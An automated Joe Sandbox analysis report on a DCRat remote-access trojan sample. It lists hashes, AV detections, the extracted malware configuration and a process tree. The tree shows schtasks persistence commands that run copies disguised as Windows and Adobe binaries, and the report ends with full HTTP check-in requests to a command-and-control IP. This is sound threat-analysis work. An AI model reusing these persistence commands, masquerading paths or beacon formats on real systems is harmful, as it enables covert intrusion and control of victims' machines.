Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
w9d568i4Ia.exe

Overview

General Information

Sample Name:w9d568i4Ia.exe
Analysis ID:706211
MD5:2405cb014678984f0655cf9603c04abd
SHA1:8c85fe8a9ae968883ac7d3e2961ce764eea9cfc1
SHA256:6a96c03f88bea76297d2b820045e131470872901959b9130b4ca34b9b0c6a4f8
Tags:DCRatexe
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Yara detected DCRat
Drops executable to a common third party application directory
Creates processes via WMI
Machine Learning detection for sample
.NET source code contains potential unpacker
.NET source code contains method to dynamically call methods (often used by packers)
Machine Learning detection for dropped file
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • w9d568i4Ia.exe (PID: 3240 cmdline: "C:\Users\user\Desktop\w9d568i4Ia.exe" MD5: 2405CB014678984F0655CF9603C04ABD)
    • cmd.exe (PID: 6332 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lJjcBPjH5n.bat" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • w32tm.exe (PID: 6384 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 71540E4248A944A8A60E80063D423608)
      • w9d568i4Ia.exe (PID: 6484 cmdline: "C:\Users\user\Desktop\w9d568i4Ia.exe" MD5: 2405CB014678984F0655CF9603C04ABD)
  • schtasks.exe (PID: 5332 cmdline: schtasks.exe /create /tn "vLhkFRJoasJvKPEeUEtnv" /sc MINUTE /mo 5 /tr "'C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 5320 cmdline: schtasks.exe /create /tn "vLhkFRJoasJvKPEeUEtn" /sc ONLOGON /tr "'C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 1756 cmdline: schtasks.exe /create /tn "vLhkFRJoasJvKPEeUEtnv" /sc MINUTE /mo 11 /tr "'C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • vLhkFRJoasJvKPEeUEtn.exe (PID: 5692 cmdline: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe MD5: 2405CB014678984F0655CF9603C04ABD)
  • schtasks.exe (PID: 5232 cmdline: schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\adobe\Acrobat Reader DC\sihost.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • vLhkFRJoasJvKPEeUEtn.exe (PID: 5604 cmdline: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe MD5: 2405CB014678984F0655CF9603C04ABD)
  • schtasks.exe (PID: 5600 cmdline: schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files (x86)\adobe\Acrobat Reader DC\sihost.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 1096 cmdline: schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\adobe\Acrobat Reader DC\sihost.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 2728 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\microsoft sql server\110\Shared\WmiPrvSE.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • sihost.exe (PID: 5424 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\sihost.exe MD5: 2405CB014678984F0655CF9603C04ABD)
  • schtasks.exe (PID: 576 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft sql server\110\Shared\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • sihost.exe (PID: 5984 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\sihost.exe MD5: 2405CB014678984F0655CF9603C04ABD)
  • schtasks.exe (PID: 2508 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\microsoft sql server\110\Shared\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • schtasks.exe (PID: 1112 cmdline: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows nt\backgroundTaskHost.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • WmiPrvSE.exe (PID: 5620 cmdline: C:\Program Files (x86)\microsoft sql server\110\Shared\WmiPrvSE.exe MD5: 2405CB014678984F0655CF9603C04ABD)
  • schtasks.exe (PID: 5572 cmdline: schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files (x86)\windows nt\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • WmiPrvSE.exe (PID: 648 cmdline: C:\Program Files (x86)\microsoft sql server\110\Shared\WmiPrvSE.exe MD5: 2405CB014678984F0655CF9603C04ABD)
  • schtasks.exe (PID: 5384 cmdline: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows nt\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • backgroundTaskHost.exe (PID: 2728 cmdline: C:\Program Files (x86)\windows nt\backgroundTaskHost.exe MD5: 2405CB014678984F0655CF9603C04ABD)
  • backgroundTaskHost.exe (PID: 5256 cmdline: C:\Program Files (x86)\windows nt\backgroundTaskHost.exe MD5: 2405CB014678984F0655CF9603C04ABD)
  • cleanup

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"G\":\"|\",\"x\":\"&\",\"H\":\"(\",\"j\":\"`\",\"O\":\"%\",\"2\":\"$\",\"J\":\"<\",\"Q\":\"-\",\"C\":\">\",\"4\":\"!\",\"M\":\"^\",\"s\":\",\",\"A\":\" \",\"L\":\")\",\"w\":\"@\",\"R\":\";\",\"b\":\"_\",\"h\":\"#\",\"E\":\"~\",\"P\":\".\",\"8\":\"*\"}", "PCRT": "{\"p\":\"|\",\"Q\":\",\",\"Y\":\"#\",\"n\":\"^\",\"0\":\"%\",\"v\":\">\",\"U\":\"*\",\"V\":\"~\",\"F\":\".\",\"E\":\"(\",\"M\":\"<\",\"1\":\" \",\"O\":\";\",\"B\":\"`\",\"x\":\"!\",\"T\":\"&\",\"W\":\")\",\"d\":\"_\",\"I\":\"@\",\"N\":\"$\",\"X\":\"-\"}", "TAG": "", "MUTEX": "DCR_MUTEX-JIsgaCJgDy2kO3yIgL8C", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.545115901.00000000129B7000.00000004.00000800.00020000.00000000.sdmpSUSP_Double_Base64_Encoded_ExecutableDetects an executable that has been encoded with base64 twiceFlorian Roth
  • 0xfe8:$: RWcVFBQU
00000000.00000002.359262511.0000000012A61000.00000004.00000800.00020000.00000000.sdmpSUSP_Double_Base64_Encoded_ExecutableDetects an executable that has been encoded with base64 twiceFlorian Roth
  • 0x649c4:$: RWcVFBQU
  • 0x86fe8:$: RWcVFBQU
00000000.00000002.359262511.0000000012A61000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    00000006.00000002.538339458.0000000002A61000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      00000006.00000002.545094899.0000000012995000.00000004.00000800.00020000.00000000.sdmpSUSP_Double_Base64_Encoded_ExecutableDetects an executable that has been encoded with base64 twiceFlorian Roth
      • 0x9c4:$: RWcVFBQU
      Click to see the 4 entries

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      Timestamp:194.190.152.128192.168.2.380497122850862 09/20/22-14:19:20.941772
      SID:2850862
      Source Port:80
      Destination Port:49712
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: w9d568i4Ia.exeReversingLabs: Detection: 84%
      Source: w9d568i4Ia.exeVirustotal: Detection: 71%Perma Link
      Source: w9d568i4Ia.exeMetadefender: Detection: 61%Perma Link
      Antivirus / Scanner detection for submitted sample
      Source: w9d568i4Ia.exeAvira: detected
      Antivirus detection for dropped file
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeAvira: detection malicious, Label: HEUR/AGEN.1203070
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\RCXA23A.tmpAvira: detection malicious, Label: HEUR/AGEN.1203070
      Source: C:\Users\user\Desktop\RCX999C.tmpAvira: detection malicious, Label: HEUR/AGEN.1203070
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\RCXA3A3.tmpAvira: detection malicious, Label: HEUR/AGEN.1203070
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeAvira: detection malicious, Label: HEUR/AGEN.1203070
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1203070
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeAvira: detection malicious, Label: HEUR/AGEN.1203070
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\RCXA6F0.tmpAvira: detection malicious, Label: HEUR/AGEN.1203070
      Source: C:\Users\user\Desktop\RCX974A.tmpAvira: detection malicious, Label: HEUR/AGEN.1203070
      Source: C:\Users\user\Pictures\Camera Roll\RCX9CF9.tmpAvira: detection malicious, Label: HEUR/AGEN.1203070
      Source: C:\Program Files (x86)\windows nt\RCXABD4.tmpAvira: detection malicious, Label: HEUR/AGEN.1203070
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\RCXA887.tmpAvira: detection malicious, Label: HEUR/AGEN.1203070
      Source: C:\Users\user\Pictures\Camera Roll\RCX9E80.tmpAvira: detection malicious, Label: HEUR/AGEN.1203070
      Source: C:\Program Files (x86)\windows nt\RCXAE26.tmpAvira: detection malicious, Label: HEUR/AGEN.1203070
      Multi AV Scanner detection for dropped file
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\RCXA3A3.tmpReversingLabs: Detection: 84%
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\RCXA3A3.tmpMetadefender: Detection: 61%Perma Link
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeReversingLabs: Detection: 84%
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeMetadefender: Detection: 61%Perma Link
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\RCXA887.tmpReversingLabs: Detection: 84%
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\RCXA887.tmpMetadefender: Detection: 61%Perma Link
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeReversingLabs: Detection: 84%
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeMetadefender: Detection: 61%Perma Link
      Source: C:\Program Files (x86)\windows nt\RCXAE26.tmpReversingLabs: Detection: 84%
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeReversingLabs: Detection: 84%
      Source: C:\Users\user\Desktop\RCX999C.tmpReversingLabs: Detection: 84%
      Source: C:\Users\user\Pictures\Camera Roll\RCX9E80.tmpReversingLabs: Detection: 84%
      Source: C:\Program Files (x86)\windows nt\RCXAE26.tmpMetadefender: Detection: 61%Perma Link
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeMetadefender: Detection: 61%Perma Link
      Source: C:\Users\user\Desktop\RCX999C.tmpMetadefender: Detection: 61%Perma Link
      Source: C:\Users\user\Pictures\Camera Roll\RCX9E80.tmpMetadefender: Detection: 61%Perma Link
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeMetadefender: Detection: 61%Perma Link
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeReversingLabs: Detection: 84%
      Machine Learning detection for sample
      Source: w9d568i4Ia.exeJoe Sandbox ML: detected
      Machine Learning detection for dropped file
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeJoe Sandbox ML: detected
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeJoe Sandbox ML: detected
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeJoe Sandbox ML: detected
      Source: 00000012.00000002.442906158.0000000002481000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"G\":\"|\",\"x\":\"&\",\"H\":\"(\",\"j\":\"`\",\"O\":\"%\",\"2\":\"$\",\"J\":\"<\",\"Q\":\"-\",\"C\":\">\",\"4\":\"!\",\"M\":\"^\",\"s\":\",\",\"A\":\" \",\"L\":\")\",\"w\":\"@\",\"R\":\";\",\"b\":\"_\",\"h\":\"#\",\"E\":\"~\",\"P\":\".\",\"8\":\"*\"}", "PCRT": "{\"p\":\"|\",\"Q\":\",\",\"Y\":\"#\",\"n\":\"^\",\"0\":\"%\",\"v\":\">\",\"U\":\"*\",\"V\":\"~\",\"F\":\".\",\"E\":\"(\",\"M\":\"<\",\"1\":\" \",\"O\":\";\",\"B\":\"`\",\"x\":\"!\",\"T\":\"&\",\"W\":\")\",\"d\":\"_\",\"I\":\"@\",\"N\":\"$\",\"X\":\"-\"}", "TAG": "", "MUTEX": "DCR_MUTEX-JIsgaCJgDy2kO3yIgL8C", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}
      Source: w9d568i4Ia.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
      Source: w9d568i4Ia.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Networking

      barindex
      Snort IDS alert for network traffic
      Source: TrafficSnort IDS: 2850862 ETPRO TROJAN DCRat Initial Checkin Server Response M4 194.190.152.128:80 -> 192.168.2.3:49712
      Source: Joe Sandbox ViewASN Name: RSHB-ASRU RSHB-ASRU
      Source: global trafficHTTP traffic detected: GET /downloads/Pipepollapi.php?iC6xQo5dJpokCi4eIn0=fwF5fxU0YsMAMpZQsHlIVmDvSw9kuH3&dcf04bdc61b03a0822281dccebb6bfa0=be0f637a60d67b7d74fe87fa45ca0c84&8777d2f9c3d9f9dbfdad95d8b9ba9864=gZjFjYxYWZ5ImN0MDOwEjY2AjZ5czMmV2NwIGZiFGM1AzYyEWMyEGN&iC6xQo5dJpokCi4eIn0=fwF5fxU0YsMAMpZQsHlIVmDvSw9kuH3 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 194.190.152.128Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /downloads/Pipepollapi.php?wFLaQKhizqFIZe4ibySgNJDenOk=g22zdeBu3xOP7Tp51xQFNa6WCIomBqw&eed4ad65d678198d0c3734e0ead7b030=AZkFTZkN2M1AzM1ITM5UGM4QzM0cTY0YWNyUWYmFTM4MTZjJTMhZ2M0gDMxUTN3YTOxATOyADO&8777d2f9c3d9f9dbfdad95d8b9ba9864=gNkBzMlhDNwUWY3czMyETNzQWMilTZiVWNwITZhNWYilzN1Y2M3QWM&10f03f723aff9ffb3fee0f8177e9e6b3=0VfiIiOiMWNxEmM0ATN4IzNhFTM4EDZiJzM5gTNjZWZ0ETZyYGMiwiI2kjMwATZmFWY2IGN2UTYzQWYjZWZlljZyEmNzMjYkFjYkRjY3ATYkJiOikjY0QjMyMTMxMmZkZ2MyY2MkFTYykTZkJDZ2M2YyITOiwiIwgTYkNTN1IDO5MjN1IDMzMGZ2EWNyE2NyQjM4QmM5cDMiZzY3EWNhJiOiAjZihzNjVWMyMWMmNjNjF2YzcjZwMTYwE2YlVzNxITYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 194.190.152.128
      Source: global trafficHTTP traffic detected: GET /downloads/Pipepollapi.php?wFLaQKhizqFIZe4ibySgNJDenOk=g22zdeBu3xOP7Tp51xQFNa6WCIomBqw&eed4ad65d678198d0c3734e0ead7b030=AZkFTZkN2M1AzM1ITM5UGM4QzM0cTY0YWNyUWYmFTM4MTZjJTMhZ2M0gDMxUTN3YTOxATOyADO&8777d2f9c3d9f9dbfdad95d8b9ba9864=gNkBzMlhDNwUWY3czMyETNzQWMilTZiVWNwITZhNWYilzN1Y2M3QWM&d27a34634985a25501c496211d5e58c7=d1nIlVGMxQ2NzgjN0kjN5EmYxU2M1MTO2Q2MiVDN3gjZmBjZhJTOjZWZ5IiOikjY0QjMyMTMxMmZkZ2MyY2MkFTYykTZkJDZ2M2YyITOiwiIwgTYkNTN1IDO5MjN1IDMzMGZ2EWNyE2NyQjM4QmM5cDMiZzY3EWNhJiOiAjZihzNjVWMyMWMmNjNjF2YzcjZwMTYwE2YlVzNxITYis3W&10f03f723aff9ffb3fee0f8177e9e6b3=d1nIiojIjVTMhJDNwUDOycTYxEDOxQmYyMTO4UzYmVGNxUmMmBjIsISZlBTMkdzM4YDN5YTOhJWMlNTNzkjNkNjY1QzN4YmZwYWYykzYmVWOiojI5IGN0IjMzETMjZGZmNjMmNDZxEmM5UGZyQmNjNmMykjIsICM4EGZzUTNygTOzYTNyAzMjRmNhVjMhdjM0IDOkJTO3AjY2M2NhVTYiojIwYmY4czYlFjMjFjZzYzYhN2M3YGMzEGMhNWZ1cTMyEmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzl0UaJDbHRmaGtWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplEWa5mRtJGaxUUS0ZUbj5WOtNWUKl2TpN2MitWNXFGWSFTUCp0QMlGNrlkNJNlYo5UbZxGZxMGcKNETptGbJZTSTpVd5cUY3lTbjpGbXRles1WSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVR50aJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFFZrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlWSp9UajVVUVp0QMlWUYF2QCNkTyE0UapHbtN2dKhlWwUzVSdWQU10ZNNDZ2JVbiBHZslkNJl2YspFbiBHZsl0cw4WSv50VhlnVudldVd0Y2pEWkZkSp9UaV1mY2BHWaRHbHRWa3lWS3FERNdXQE1UavpWSzZ0RkpXOHNWa3lWSrVzVZNnSYplNShVYz4kRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0UkeOFDND90cNRkT1NGROl2bqlka5ckYpdXaJlkTrlkNJNVZ5JlbiFTOykVa3lWSv50VhlnVudVavpWS1lzVh5mVtNWa3lWSv50VhlnVudVavpWS1IFWhpmSDxUaNRkT1lEVOV3YU1UdRR0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS2IVbjhGatlkNJNlW0ZUbUlnVyMmVKNETpNmaNNzZ61EeJl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMWNxEmM0ATN4IzNhFTM4EDZiJzM5gTNjZWZ0ETZyYGMiwiIyYWYhVWMlFjM3YmYhNzNwcjY4ITO4kDO3IWNhdTOmBzM2MDMlRWN5IiOikjY0QjMyMTMxMmZkZ2MyY2MkFTYykTZkJDZ2M2YyITOiwiIwgTYkNTN1IDO5MjN1IDMzMGZ2EWNyE2NyQjM4QmM5cDMiZzY3EWNhJiOiAjZihzNjVWMyMWMmNjNjF2YzcjZwMTYwE2YlVzNxITYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 194.190.152.128
      Source: global trafficHTTP traffic detected: GET /downloads/Pipepollapi.php?wFLaQKhizqFIZe4ibySgNJDenOk=g22zdeBu3xOP7Tp51xQFNa6WCIomBqw&eed4ad65d678198d0c3734e0ead7b030=AZkFTZkN2M1AzM1ITM5UGM4QzM0cTY0YWNyUWYmFTM4MTZjJTMhZ2M0gDMxUTN3YTOxATOyADO&8777d2f9c3d9f9dbfdad95d8b9ba9864=gNkBzMlhDNwUWY3czMyETNzQWMilTZiVWNwITZhNWYilzN1Y2M3QWM&72bf888d6a47dcb7b598ddaa2d446ee7=0VfiAjbJNHeyI2UCNVW5Z1VihmTFh1YOhlW5ZFSkpGbHV1Y4xWZrpEWZ9GeGhleKhlW6ZlRYNGc6FVavpWSvJFWZFlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVtmSzImaOhVYFp0QMlWSp9UandEZoJkVihmSzoFb4dlWVp0QMlWSp9UaNh0Y3ZUVihmVHRGVKNETpRjMkZXNyEWdWxWS2k0QSpkSYpleWZlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJl2Ys5EWWRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJ5WNXlVTxcVWsJ1MVl2dplUdkNjY1RXbiZlSp9UandEZoJkVihmVHRGVKNETpFleOpXSUxUboRkT0cmaZpmWyUWdwgUT3FERNdXQE10d0MVT1FkaMd3culkNJl3YsVjMi9mQzIWeOdVYOp0QMlWSp9UaNhlYo5UbZxGZsl0cJlmYjpESYh3aWFVTCFTVKJVRYNWNDh1Y4ZEWp9maJpXNXpFbKNTWUp0QMlWSqx0M0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiMWNxEmM0ATN4IzNhFTM4EDZiJzM5gTNjZWZ0ETZyYGMiwiI2kjMwATZmFWY2IGN2UTYzQWYjZWZlljZyEmNzMjYkFjYkRjY3ATYkJiOikjY0QjMyMTMxMmZkZ2MyY2MkFTYykTZkJDZ2M2YyITOiwiIwgTYkNTN1IDO5MjN1IDMzMGZ2EWNyE2NyQjM4QmM5cDMiZzY3EWNhJiOiAjZihzNjVWMyMWMmNjNjF2YzcjZwMTYwE2YlVzNxITYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 194.190.152.128Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /downloads/Pipepollapi.php?wFLaQKhizqFIZe4ibySgNJDenOk=g22zdeBu3xOP7Tp51xQFNa6WCIomBqw&eed4ad65d678198d0c3734e0ead7b030=AZkFTZkN2M1AzM1ITM5UGM4QzM0cTY0YWNyUWYmFTM4MTZjJTMhZ2M0gDMxUTN3YTOxATOyADO&8777d2f9c3d9f9dbfdad95d8b9ba9864=gNkBzMlhDNwUWY3czMyETNzQWMilTZiVWNwITZhNWYilzN1Y2M3QWM&d27a34634985a25501c496211d5e58c7=d1nIlVGMxQ2NzgjN0kjN5EmYxU2M1MTO2Q2MiVDN3gjZmBjZhJTOjZWZ5IiOikjY0QjMyMTMxMmZkZ2MyY2MkFTYykTZkJDZ2M2YyITOiwiIwgTYkNTN1IDO5MjN1IDMzMGZ2EWNyE2NyQjM4QmM5cDMiZzY3EWNhJiOiAjZihzNjVWMyMWMmNjNjF2YzcjZwMTYwE2YlVzNxITYis3W&10f03f723aff9ffb3fee0f8177e9e6b3=d1nIiojIjVTMhJDNwUDOycTYxEDOxQmYyMTO4UzYmVGNxUmMmBjIsISZlBTMkdzM4YDN5YTOhJWMlNTNzkjNkNjY1QzN4YmZwYWYykzYmVWOiojI5IGN0IjMzETMjZGZmNjMmNDZxEmM5UGZyQmNjNmMykjIsICM4EGZzUTNygTOzYTNyAzMjRmNhVjMhdjM0IDOkJTO3AjY2M2NhVTYiojIwYmY4czYlFjMjFjZzYzYhN2M3YGMzEGMhNWZ1cTMyEmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplEWa5mRtJGaxUUS0ZUbj5WOtNWUKl2TpN2MitWNXFGWSFTUCp0QMlGNrlkNJNlYo5UbZxGZxMGcKNETptGbJZTSTpVd5cUY3lTbjpGbXRles1WSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVR50aJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFFZrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlWSp9UajVVUVp0QMlWUYF2QCNkTyE0UapHbtN2dKhlWwUzVSdWQU10ZNNDZ2JVbiBHZslkNJl2YspFbiBHZsl0cw4WSv50VhlnVudldVd0Y2pEWkZkSp9UaV1mY2BHWaRHbHRWa3lWS3FERNdXQE1UavpWSzZ0RkpXOHNWa3lWSrVzVZNnSYplNShVYz4kRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0UkeOFDND90cNRkT1NGROl2bqlka5ckYpdXaJlkTrlkNJNVZ5JlbiFTOykVa3lWSv50VhlnVudVavpWS1lzVh5mVtNWa3lWSv50VhlnVudVavpWS1IFWhpmSDxUaNRkT1lEVOV3YU1UdRR0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS2IVbjhGatlkNJNlW0ZUbUlnVyMmVKNETpNmaNNzZ61EeJl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMWNxEmM0ATN4IzNhFTM4EDZiJzM5gTNjZWZ0ETZyYGMiwiIyYWYhVWMlFjM3YmYhNzNwcjY4ITO4kDO3IWNhdTOmBzM2MDMlRWN5IiOikjY0QjMyMTMxMmZkZ2MyY2MkFTYykTZkJDZ2M2YyITOiwiIwgTYkNTN1IDO5MjN1IDMzMGZ2EWNyE2NyQjM4QmM5cDMiZzY3EWNhJiOiAjZihzNjVWMyMWMmNjNjF2YzcjZwMTYwE2YlVzNxITYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 194.190.152.128Connection: Keep-Alive
